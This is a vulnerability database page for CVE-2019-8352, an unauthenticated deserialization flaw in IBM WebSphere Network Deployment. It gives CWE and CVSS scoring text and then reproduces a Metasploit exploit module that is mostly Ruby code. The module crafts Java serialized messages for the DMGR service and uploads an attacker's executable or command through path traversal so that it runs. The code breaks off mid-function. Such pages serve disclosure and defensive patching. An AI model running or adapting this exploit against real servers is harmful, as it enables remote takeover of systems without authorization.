Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-502 |
Deserialization of Untrusted Data The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V3.1 |
9.8 |
CRITICAL |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsThe Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact MetricsThe Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental MetricsThese metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.
|
[email protected] |
V3.0 |
9 |
CRITICAL |
CVSS:3.0/S:C/A:H/AC:H/I:H/C:H/AV:N/PR:N/UI:N/RL:O/RC:C/E:U
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Exploit Code Maturity This metric measures the likelihood of the vulnerability being attacked, and is typically based on the current state of exploit techniques, exploit code availability, or active, 'in-the-wild' exploitation. No exploit code is available, or an exploit is theoretical. Remediation Level The Remediation Level of a vulnerability is an important factor for prioritization. A complete vendor solution is available. Either the vendor has issued an official patch, or an upgrade is available. Report Confidence This metric measures the degree of confidence in the existence of the vulnerability and the credibility of the known technical details. Detailed reports exist, or functional reproduction is possible (functional exploits may provide this). Source code is available to independently verify the assertions of the research, or the author or vendor of the affected code has confirmed the presence of the vulnerability. Environmental Metrics
|
|
V3.0 |
9 |
CRITICAL |
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Base: Exploitabilty MetricsThe Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. A vulnerability exploitable with network access means the vulnerable component is bound to the network stack and the attacker's path is through OSI layer 3 (the network layer). Such a vulnerability is often termed 'remotely exploitable' and can be thought of as an attack being exploitable one or more network hops away (e.g. across layer 3 boundaries from routers). Attack Complexity This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability. A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack. User Interaction This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component. The vulnerable system can be exploited without interaction from any user. Base: Scope MetricsAn important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges. Scope Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports. An exploited vulnerability can affect resources beyond the authorization privileges intended by the vulnerable component. In this case the vulnerable component and the impacted component are different. Base: Impact MetricsThe Impact metrics refer to the properties of the impacted component. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable). Temporal MetricsThe Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability. Environmental Metrics
|
[email protected] |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 46969
Publication date : 2019-06-04
22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
'Description' => %(
This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
),
'License' => MSF_LICENSE,
'Author' =>
[
'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
],
'References' =>
[
['CVE', '2019-8352'],
['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
],
'Platform' => ['win'],
'Targets' =>
[
[
'Windows Binary', {
'Arch' => [ARCH_X86, ARCH_X64],
'Platform' => 'win'
}
],
[
'CMD', {
'Arch' => ARCH_CMD,
'Platform' => 'win',
'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
}
]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'May 15 2019'))
register_options(
[
Opt::RPORT(11006), # 11002,11004,11006,etc
OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
]
)
end
def cleanup
disconnect
print_status('Disconnected from IBM Websphere DMGR.')
super
end
def exploit
command = nil
if target.name == 'CMD'
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
command = datastore['CMD']
end
# Connect to IBM Websphere Application Server
connect
print_status("Connected to IBM WAS DMGR.")
node_port = datastore['RPORT']
# Send packet to add neighbor
enc_stream = construct_tcp_node_msg(node_port)
send_msg(enc_stream)
sock.get_once
print_status('Server responded')
# Generate binary name
bin_name = rand_text_alpha(8)
if command
command = datastore['CMD']
payload_contents = command.to_s
print_status('Executing command: ' + payload_contents)
bin_name << ".bat"
else
payload_contents = generate_payload_exe(code: payload.generate)
bin_name << ".exe"
end
print_status("Sending payload: #{bin_name}")
enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
send_msg(enc_stream)
register_file_for_cleanup(bin_name)
end
def send_msg(enc_stream)
pkt = [0x396fb74a].pack('N')
pkt += [enc_stream.length + 1].pack('N')
pkt += "\x00"
pkt += enc_stream
# Send msg
sock.put(pkt)
end
def construct_tcp_node_msg(node_port)
p2p_obj = Rex::Java::Serialization::Model::NewObject.new
p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
# Create the obj
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
# Create the stream and add the object
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
stream.contents << Rex::Java::Serialization::Model::NullReference.new
stream.encode
end
def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
# Add upload file argument
byte_arr = byte_str.unpack("C*")
upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
# Create the obj
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
# Create the stream and add the object
stream = Rex::Java::Serialization::Model::Stream.new
stream.contents = []
stream.contents << object
stream.encode
end
def build_message(obj, msg_id, msg_type, orig_cell_field_type)
# Create the integer field and add the reference
id_field = Rex::Java::Serialization::Model::Field.new
id_field.type = 'int'
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
# Create the integer field and add the reference
type_field = Rex::Java::Serialization::Model::Field.new
type_field.type = 'int'
type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
# Create the object field and add the reference
new_field = Rex::Java::Serialization::Model::Field.new
new_field.type = 'object'
new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
new_field.field_type = orig_cell_field_type
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << id_field
msg_class_desc.fields << type_field
msg_class_desc.fields << new_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Set the member values
obj.class_data << ['int', msg_id]
obj.class_data << ['int', msg_type]
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
msg_class_desc
end
def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
prng = Random.new
msg_id = prng.rand(4294967295)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
msg_obj = build_message(obj, msg_id, msg_type, field_ref)
# Create the integer field and add the reference
id_field = Rex::Java::Serialization::Model::Field.new
id_field.type = 'int'
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
# Create the integer field and add the reference
port_field = Rex::Java::Serialization::Model::Field.new
port_field.type = 'int'
port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
# Create the object field and add the reference
ip_arr_field = Rex::Java::Serialization::Model::Field.new
ip_arr_field.type = 'array'
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << id_field
msg_class_desc.fields << port_field
msg_class_desc.fields << ip_arr_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Construct IP Array
ip_arr = source_ip.split(".").map(&:to_i)
builder = Rex::Java::Serialization::Builder.new
values_array = builder.new_array(
values_type: 'byte',
values: ip_arr,
name: '[B',
serial: 0x42acf317f8060854e0,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
# Set the member values
obj.class_data << ['int', msg_id]
obj.class_data << ['int', source_port]
obj.class_data << values_array
msg_class_desc
end
def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
prng = Random.new
msg_id = prng.rand(4294967295)
# Create the field type for the origCell
field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
msg_obj = build_message(obj, msg_id, msg_type, field_type)
# Create the port field and add the reference
boot_time_field = Rex::Java::Serialization::Model::Field.new
boot_time_field.type = 'long'
boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
# Create the port field and add the reference
tcp_port_field = Rex::Java::Serialization::Model::Field.new
tcp_port_field.type = 'int'
tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
# Create the port field and add the reference
udp_port_field = Rex::Java::Serialization::Model::Field.new
udp_port_field.type = 'int'
udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
# Create the object field and add the reference
ip_arr_field = Rex::Java::Serialization::Model::Field.new
ip_arr_field.type = 'array'
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
# Create the task object field and add field_type
node_prop_field = Rex::Java::Serialization::Model::Field.new
node_prop_field.type = 'object'
node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << boot_time_field
msg_class_desc.fields << tcp_port_field
msg_class_desc.fields << udp_port_field
msg_class_desc.fields << ip_arr_field
msg_class_desc.fields << node_prop_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Construct IP Array
ip_arr = source_ip.split(".").map(&:to_i)
builder = Rex::Java::Serialization::Builder.new
values_array = builder.new_array(
values_type: 'byte',
values: ip_arr,
name: '[B',
serial: 0x42acf317f8060854e0,
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
)
# Set the member values
obj.class_data << ['long', 0]
obj.class_data << ['int', source_port]
obj.class_data << ['int', source_port]
obj.class_data << values_array
obj.class_data << p2p_obj
msg_class_desc
end
def build_app_node_class(obj)
# Create the structured gateway field and add the reference
struct_bool_field = Rex::Java::Serialization::Model::Field.new
struct_bool_field.type = 'boolean'
struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
# Create the version field and add the reference
version_field = Rex::Java::Serialization::Model::Field.new
version_field.type = 'int'
version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
# Create the object field and add the reference
bridge_field = Rex::Java::Serialization::Model::Field.new
bridge_field.type = 'object'
bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
# Create the cellname field and add the reference
cellname_field = Rex::Java::Serialization::Model::Field.new
cellname_field.type = 'object'
cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
cellname_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << struct_bool_field
msg_class_desc.fields << version_field
msg_class_desc.fields << bridge_field
msg_class_desc.fields << cellname_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Set the member values
obj.class_data << ['boolean', 0]
obj.class_data << ['int', 0]
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
msg_class_desc
end
def build_hashtable_class(obj)
# Create the integer field and add the reference
load_field = Rex::Java::Serialization::Model::Field.new
load_field.type = 'float'
load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
# Create the integer field and add the reference
threshold_field = Rex::Java::Serialization::Model::Field.new
threshold_field.type = 'int'
threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
msg_class_desc.serial_version = 0x13BB0F25214AE4B8
msg_class_desc.flags = 3
msg_class_desc.fields = []
msg_class_desc.fields << load_field
msg_class_desc.fields << threshold_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
obj.class_data << ['float', 0.75]
obj.class_data << ['int', 8]
obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
msg_class_desc
end
def build_properties_class
# Create the object
object = Rex::Java::Serialization::Model::NewObject.new
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
msg_obj = build_hashtable_class(object)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
# Create the integer field and add the reference
defaults_field = Rex::Java::Serialization::Model::Field.new
defaults_field.type = 'object'
defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
defaults_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
msg_class_desc.serial_version = 0x3912D07A70363E98
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << defaults_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Set the member values
object.class_desc.description = msg_class_desc
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
object
end
def build_p2p_node_class(obj)
msg_obj = build_app_node_class(obj)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the data field and add the reference
data_field = Rex::Java::Serialization::Model::Field.new
data_field.type = 'array'
data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
data_field.field_type = field_ref
# Create the object field and add the reference
prop_field = Rex::Java::Serialization::Model::Field.new
prop_field.type = 'object'
prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
msg_class_desc.serial_version = 2
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << data_field
msg_class_desc.fields << prop_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = msg_obj
# Create the byte array ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
# Construct IP Array
byte_array = Rex::Java::Serialization::Model::NewArray.new
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
byte_array.array_description.description = field_ref
byte_array.type = "byte"
byte_array.values = []
# Set the member values
obj.class_data << byte_array
# Add properties
obj.class_data << build_properties_class
msg_class_desc
end
def build_upfile_arg_class(filename, bytes, cmd)
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the integer field and add the reference
filename_field = Rex::Java::Serialization::Model::Field.new
filename_field.type = 'object'
filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
filename_field.field_type = field_ref
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
# Create the integer field and add the reference
filebody_field = Rex::Java::Serialization::Model::Field.new
filebody_field.type = 'array'
filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
filebody_field.field_type = field_ref
# Create the field ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
# Create the object field and add the reference
post_cmd_field = Rex::Java::Serialization::Model::Field.new
post_cmd_field.type = 'object'
post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
post_cmd_field.field_type = field_ref
# Create the class description
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
msg_class_desc.serial_version = 1
msg_class_desc.flags = 2
msg_class_desc.fields = []
msg_class_desc.fields << filebody_field
msg_class_desc.fields << filename_field
msg_class_desc.fields << post_cmd_field
# Add annotations
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
# Add superclass
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
# Create the byte array ref
field_ref = Rex::Java::Serialization::Model::Reference.new
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
# Construct IP Array
byte_array = Rex::Java::Serialization::Model::NewArray.new
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
byte_array.array_description.description = field_ref
byte_array.type = "byte"
byte_array.values = bytes
# Set the member values
object = Rex::Java::Serialization::Model::NewObject.new
